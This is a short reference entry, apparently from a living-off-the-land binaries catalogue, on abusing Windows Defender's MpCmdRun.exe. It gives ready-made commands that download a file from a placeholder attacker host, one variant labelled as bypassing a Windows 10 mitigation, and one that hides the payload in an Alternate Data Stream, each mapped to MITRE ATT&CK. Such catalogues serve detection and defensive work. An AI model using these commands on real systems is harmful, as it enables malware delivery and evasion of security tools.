.. /
MpCmdRun.exe
Binary part of Windows Defender. Used to manage settings in Windows Defender
Paths:
- C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
- C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
- C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
Resources:
Download
Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
Usecase: Download file
Privileges required: User
OS: Windows 10
MITRE ATT&CK®: T1105
Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
Usecase: Download file
Privileges required: User
OS: Windows 10
MITRE ATT&CK®: T1105
Alternate data streams
Download file to machine and store it in Alternate Data Stream
MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe
Usecase: Hide downloaded data inton an Alternate Data Stream
Privileges required: User
OS: Windows 10
MITRE ATT&CK®: T1564.004